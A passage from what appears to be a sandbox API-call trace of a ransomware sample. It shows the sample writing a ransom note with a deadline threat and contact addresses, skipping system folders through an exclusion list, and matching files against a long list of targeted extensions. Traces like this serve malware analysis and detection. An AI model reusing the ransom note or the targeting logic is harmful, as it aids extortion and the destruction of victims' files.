further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0176.589] WriteFile (in: hFile=0xffffffff, lpBuffer=0x189b24, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0) returned 0
	[0176.590] CloseHandle (hObject=0xffffffff) returned 1
	[0176.590] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.590] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.591] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.591] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0176.592] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.592] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.598] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0176.598] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0176.598] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18a538, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0) returned 0
	[0176.598] CloseHandle (hObject=0xffffffff) returned 1
	[0176.598] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0176.601] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*") returned 55
	[0176.601] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.601] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*") returned 0x37
	[0176.601] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.602] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="windows") returned 0x0
	[0176.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.602] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="boot") returned 0x0
	[0176.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.602] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="system volume information") returned 0x0
	[0176.602] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.602] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.603] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="temp") returned 0x0
	[0176.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.603] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="program files") returned 0x0
	[0176.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.603] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="appdata") returned 0x0
	[0176.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="application data") returned 0x0
	[0176.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="winnt") returned 0x0
	[0176.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="tmp") returned 0x0
	[0176.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="cache") returned 0x0
	[0176.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="webcache") returned 0x0
	[0176.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="inetcache") returned 0x0
	[0176.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="nvidia") returned 0x0
	[0176.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="packages") returned 0x0
	[0176.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="cookies") returned 0x0
	[0176.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\*.*", lpSrch="programdata") returned 0x0
	[0176.608] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0176.608] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0176.608] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.608] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0176.608] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x500dbf59, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1
	[0176.609] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x500dbf59, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.log", cAlternateFileName="")) returned 1
	[0176.609] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb00001.log", cAlternateFileName="")) returned 1
	[0176.609] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcaa32ae, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcaa32ae, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1
	[0176.609] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcaa32ae, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcaa32ae, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1
	[0176.609] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbtmp.log", cAlternateFileName="")) returned 1
	[0176.609] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x5001d2cc, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmsInterceptStore.db", cAlternateFileName="SMSINT~1.DB")) returned 1
	[0176.609] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x5001d2cc, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmsInterceptStore.db", cAlternateFileName="SMSINT~1.DB")) returned 0
	[0176.609] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0176.612] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0176.612] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MessageStore", cAlternateFileName="MESSAG~1")) returned 0
	[0176.612] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0176.613] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0176.613] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1
	[0176.613] lstrcmpW (lpString1="User Account Pictures", lpString2="..") returned 1
	[0176.613] lstrcmpW (lpString1="User Account Pictures", lpString2=".") returned 1
	[0176.613] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0176.613] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0176.613] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="User Account Pictures" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures"
	[0176.614] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures"
	[0176.614] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0176.614] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0176.614] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*"
	[0176.614] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0176.615] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*") returned 54
	[0176.615] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.615] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*.*", cchLength=0x36 | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\*.*") returned 0x36
	[0176.615] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.615] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="windows") returned 0x0
	[0176.615] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.615] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="boot") returned 0x0
	[0176.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="system volume information") returned 0x0
	[0176.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0176.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.616] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="temp") returned 0x0
	[0176.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="program files") returned 0x0
	[0176.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="program files (x86)") returned 0x0
	[0176.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="appdata") returned 0x0
	[0176.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="application data") returned 0x0
	[0176.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="winnt") returned 0x0
	[0176.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="tmp") returned 0x0
	[0176.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="cache") returned 0x0
	[0176.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="temporary internet files") returned 0x0
	[0176.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="webcache") returned 0x0
	[0176.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="inetcache") returned 0x0
	[0176.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="nvidia") returned 0x0
	[0176.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="packages") returned 0x0
	[0176.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="cookies") returned 0x0
	[0176.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\*.*", lpSrch="programdata") returned 0x0
	[0176.621] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0176.621] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x93038, dwReserved0=0x0, dwReserved1=0x0, cFileName="guest.bmp", cAlternateFileName="")) returned 1
	[0176.621] lstrcmpW (lpString1="guest.bmp", lpString2="..") returned 1
	[0176.621] lstrcmpW (lpString1="guest.bmp", lpString2=".") returned 1
	[0176.621] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0176.621] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="guest.bmp" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp"
	[0176.622] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp") returned 60
	[0176.622] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.622] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp", cchLength=0x3c | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp") returned 0x3c
	[0176.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.622] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.622] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp") returned="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"
	[0176.622] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp") returned 60
	[0176.623] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.623] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0176.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.623] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.z